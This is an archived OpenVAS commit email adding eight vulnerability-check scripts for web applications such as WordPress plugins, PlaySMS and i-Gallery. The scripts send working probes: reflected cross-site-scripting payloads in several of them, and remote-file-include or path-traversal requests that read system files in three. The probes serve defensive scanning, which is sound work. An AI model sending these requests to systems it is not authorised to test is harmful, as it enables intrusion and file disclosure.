[Openvas-commits] r11658 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Sep 22 13:43:28 CEST 2011


Author: mime
Date: 2011-09-22 13:43:24 +0200 (Thu, 22 Sep 2011)
New Revision: 11658

Added:
   trunk/openvas-plugins/scripts/gb_GeoClassifieds_49475.nasl
   trunk/openvas-plugins/scripts/gb_igallery_49712.nasl
   trunk/openvas-plugins/scripts/gb_papoo_49587.nasl
   trunk/openvas-plugins/scripts/gb_playsms_49474.nasl
   trunk/openvas-plugins/scripts/gb_skadate_49502.nasl
   trunk/openvas-plugins/scripts/gb_wordpress_49691.nasl
   trunk/openvas-plugins/scripts/gb_wordpress_49713.nasl
   trunk/openvas-plugins/scripts/gb_yabsoft_image_hosting_script_49457.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/ChangeLog	2011-09-22 11:43:24 UTC (rev 11658)
@@ -1,3 +1,15 @@
+2011-09-22  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_yabsoft_image_hosting_script_49457.nasl,
+	scripts/gb_GeoClassifieds_49475.nasl,
+	scripts/gb_wordpress_49691.nasl,
+	scripts/gb_skadate_49502.nasl,
+	scripts/gb_playsms_49474.nasl,
+	scripts/gb_igallery_49712.nasl,
+	scripts/gb_wordpress_49713.nasl,
+	scripts/gb_papoo_49587.nasl:
+	Added new plugins.
+
 2011-09-22  Veerendra G.G <veerendragg at secpod.com>,
 
 	* scripts/secpod_atutor_mult_vuln.nasl,
@@ -14,7 +26,7 @@
 
 2011-09-20 Thomas Reinke <reinke at securityspace.com>
 
-	scripts/CA_License_Service_Stack_Overflow.nasl,
+	* scripts/CA_License_Service_Stack_Overflow.nasl,
 	scripts/RHSA_2008_0787.nasl,
 	scripts/RHSA_2009_0001.nasl,
 	scripts/RHSA_2009_0009.nasl,

Added: trunk/openvas-plugins/scripts/gb_GeoClassifieds_49475.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_GeoClassifieds_49475.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_GeoClassifieds_49475.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# GeoClassifieds Lite Multiple Cross Site Scripting and SQL Injection Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103270);
+ script_bugtraq_id(49475);
+ script_version ("1.0-$Revision$");
+
+ script_name("GeoClassifieds Lite Multiple Cross Site Scripting and SQL Injection Vulnerabilities");
+
+desc = "Overview:
+GeoClassifieds Lite is prone to multiple SQL-injection and cross-site
+scripting vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-
+based authentication credentials, compromise the application,
+access or modify data, or exploit latent vulnerabilities in the
+underlying database.
+
+GeoClassifieds Lite 2.0.1, 2.0.3.1, 2.0.3.2 and 2.0.4 are vulnerable;
+other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/49475
+http://www.geodesicsolutions.com/";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed GeoClassifieds is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/index.php?a=19&c=</div><script>alert(/openvas-xss-test/);</script>"); 
+
+  if(http_vuln_check(port:port,url:url,pattern:"<script>alert\(/openvas-xss-test/\);</script>",check_header:TRUE,extra_check:"powered by GeoClassifieds")) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_GeoClassifieds_49475.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_igallery_49712.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_igallery_49712.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_igallery_49712.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# i-Gallery 'd' Parameter Cross Site Scripting Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103263);
+ script_bugtraq_id(49712);
+ script_version ("1.0-$Revision$");
+
+ script_name("i-Gallery 'd' Parameter Cross Site Scripting Vulnerability");
+
+desc = "Overview:
+i-Gallery is prone to a cross-site scripting vulnerability because it
+fails to properly sanitize user-supplied input.
+
+An attacker could leverage this issue to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected
+site. This could allow the attacker to steal cookie-based
+authentication credentials and launch other attacks.
+
+i-Gallery 3.4 is vulnerable; other versions may also be affected.
+
+
+References:
+http://www.securityfocus.com/bid/49712
+http://www.b-cp.com/igallery/download.asp
+";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if i-Gallery is prone to a cross-site scripting vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_asp(port:port))exit(0);
+
+dirs = make_list("/igallery","/gallery",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/igallery.asp?d=%22%3E%3Cscript%3Ealert%28%27openvas-xss-test%27%29%3C/script%3E"); 
+
+  if(http_vuln_check(port:port, url:url,pattern:"<script>alert\('openvas-xss-test'\)</script>")) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_igallery_49712.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_papoo_49587.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_papoo_49587.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_papoo_49587.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Papoo CMS Light Multiple Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103268);
+ script_bugtraq_id(49587);
+ script_version ("1.0-$Revision$");
+
+ script_name("Papoo CMS Light Multiple Cross Site Scripting Vulnerabilities");
+
+desc = "Overview:
+Papoo CMS Light is prone to multiple cross-site scripting
+vulnerabilities because it fails to properly sanitize user-
+supplied input.
+
+An attacker may leverage these issues to execute arbitrary HTML and
+script code in the browser of an unsuspecting user in the context of
+the affected site. This may let the attacker steal cookie-based
+authentication credentials and launch other attacks.
+
+Papoo CMS Light 4.0 is vulnerable; other versions may also be
+affected.
+
+Solution:
+Updates are available. Please see the references for more details.
+
+References:
+http://www.securityfocus.com/bid/49587
+http://www.papoo.de/
+http://www.securityfocus.com/archive/1/519612";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed Papoo CMS is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/cms","/papoo",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir,'/index.php/"></a><script>alert(/openvas-xss-test/);</script>'); 
+
+  if(http_vuln_check(port:port, url:url,pattern:"<script>alert\(/openvas-xss-test/\);</script>",check_header:TRUE,extra_check:"Papoo")) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_papoo_49587.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_playsms_49474.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_playsms_49474.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_playsms_49474.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PlaySMS 'apps_path[themes]' Parameter Multiple Remote File Include Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103271);
+ script_bugtraq_id(49474);
+ script_version ("1.0-$Revision$");
+
+ script_name("PlaySMS 'apps_path[themes]' Parameter Multiple Remote File Include Vulnerabilities");
+
+desc = "Overview:
+PlaySMS is prone to multiple remote file-include
+vulnerabilities because the application fails to sufficiently
+sanitize user-supplied input.
+
+Exploiting these issues may allow a remote attacker to obtain
+sensitive information or to execute arbitrary script code in the
+context of the webserver process. This may allow the attacker to
+compromise the application and the underlying computer; other attacks
+are also possible.
+
+PlaySMS 0.9.5.2 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/49474
+http://playsms.sourceforge.net/";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed PlaySMS is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/sms","/playsms",cgi_dirs());
+files = traversal_files();
+
+foreach dir (dirs) {
+
+  foreach file (keys(files)) {
+   
+    url = string(dir,"/plugin/themes/default/page_forgot.php?apps_path[themes]=/",files[file],"%00"); 
+
+    if(http_vuln_check(port:port, url:url,pattern:file)) {
+     
+      security_warning(port:port);
+      exit(0);
+
+    }
+  }
+}
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_playsms_49474.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_skadate_49502.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_skadate_49502.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_skadate_49502.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# SkaDate 'blogs.php' Cross Site Scripting Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103269);
+ script_bugtraq_id(49502);
+ script_version ("1.0-$Revision$");
+
+ script_name("SkaDate 'blogs.php' Cross Site Scripting Vulnerability");
+
+desc = "Overview:
+SkaDate is prone to a cross-site scripting vulnerability because it
+fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in
+the browser of an unsuspecting user in the context of the affected
+site. This may help the attacker steal cookie-based authentication
+credentials and launch other attacks.
+
+References:
+http://www.securityfocus.com/bid/49502
+http://www.skadate.com";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if SkaDate is prone to a cross-site scripting vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/blog",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/blogs.php?tag=gamecat+<script>alert(/openvas-xss-test/)</script>"); 
+
+  if(http_vuln_check(port:port, url:url,pattern:"<script>alert\(/openvas-xss-test/\)</script>",check_header:TRUE)) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_skadate_49502.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_wordpress_49691.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wordpress_49691.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_wordpress_49691.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WordPress Mailing List Plugin 'wpabspath' Parameter Remote File Include Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103267);
+ script_bugtraq_id(49691);
+ script_version ("1.0-$Revision$");
+
+ script_name("WordPress Mailing List Plugin 'wpabspath' Parameter Remote File Include Vulnerability");
+
+desc = "Overview:
+The Mailing List plug-in for WordPress is prone to a remote file-
+include vulnerability because it fails to sufficiently sanitize user-
+supplied input.
+
+Exploiting this issue could allow an attacker to compromise the
+application and the underlying system; other attacks are also
+possible.
+
+Mailing List 1.3.2 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/49691
+http://wordpress.org/extend/plugins/mailz/
+http://wordpress.org/";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed WordPress is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("secpod_wordpress_detect_900182.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port, app:"WordPress"))exit(0);
+files = traversal_files();
+
+foreach file (keys(files)) {
+   
+  url = string(dir,"/wp-content/plugins/mailz/lists/config/config.php?wpabspath=/",files[file]); 
+
+  if(http_vuln_check(port:port, url:url,pattern:file)) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_wordpress_49691.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_wordpress_49713.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wordpress_49713.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_wordpress_49713.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WordPress Adsense Extreme Plugin 'adsensextreme[lang]' Parameter Remote File Include Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103264);
+ script_bugtraq_id(49713);
+ script_version ("1.0-$Revision$");
+
+ script_name("WordPress Adsense Extreme Plugin 'adsensextreme[lang]' Parameter Remote File Include Vulnerability");
+
+desc = "Overview:
+The Adsense Extreme plug-in for WordPress is prone to a remote
+file-include vulnerability because it fails to sufficiently
+sanitize user-supplied input.
+
+Exploiting this issue could allow an attacker to compromise the
+application and the underlying system; other attacks are also
+possible.
+
+Adsense Extreme 1.0.3 is vulnerable; other versions may also be
+affected.
+
+Solution:
+Updates are available. Please see the references for more details.
+
+References:
+http://www.securityfocus.com/bid/49713
+http://wordpress.org/extend/plugins/adsense-extreme/
+http://wordpress.org/";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed WordPres is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("secpod_wordpress_detect_900182.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+if(!dir = get_dir_from_kb(port:port, app:"WordPress"))exit(0);
+
+files = traversal_files();
+
+foreach file (keys(files)) {
+
+  variables = string("adsensextreme[lang]=/",files[file],"%00");
+  filename  = string(dir,"//wp-content/plugins/adsense-extreme/adsensextremeadminpage.php");
+  host      = get_host_name();
+
+  req = string(
+      "POST ", filename, " HTTP/1.1\r\n", 
+      "Referer: ","http://", host, filename, "\r\n",
+      "Host: ", host, ":", port, "\r\n", 
+      "Content-Type: application/x-www-form-urlencoded\r\n", 
+      "Content-Length: ", strlen(variables), 
+      "\r\n\r\n", 
+      variables
+  );
+
+  result = http_send_recv(port:port, data:req, bodyonly:FALSE);
+
+  if(egrep(pattern: file, string: result, icase: TRUE)) {
+
+    security_warning(port:port);
+    exit(0);
+
+  }
+
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_wordpress_49713.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_yabsoft_image_hosting_script_49457.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_yabsoft_image_hosting_script_49457.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_yabsoft_image_hosting_script_49457.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# YABSoft Advanced Image Hosting Script 'report.php' Cross Site Scripting Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103272);
+ script_bugtraq_id(49457);
+ script_version ("1.0-$Revision$");
+
+ script_name("YABSoft Advanced Image Hosting Script 'report.php' Cross Site Scripting Vulnerability");
+
+desc = "Overview:
+YABSoft Advanced Image Hosting Script is prone to a cross-site
+scripting vulnerability because it fails to properly sanitize user-
+supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected
+site. This may let the attacker steal cookie-based authentication
+credentials and launch other attacks.
+
+Advanced Image Hosting Script 2.3 is vulnerable; other versions may
+also be affected.
+
+References:
+http://www.securityfocus.com/bid/49457
+http://yabsoft.com/aihs-feature.php";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed ABSoft Advanced Image Hosting Script is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/images",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/report.php?img_id=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E"); 
+
+  if(http_vuln_check(port:port, url:url,pattern:"<script>alert\(/openvas-xss-test/\)</script>",check_header:TRUE)) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_yabsoft_image_hosting_script_49457.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision



More information about the Openvas-commits mailing list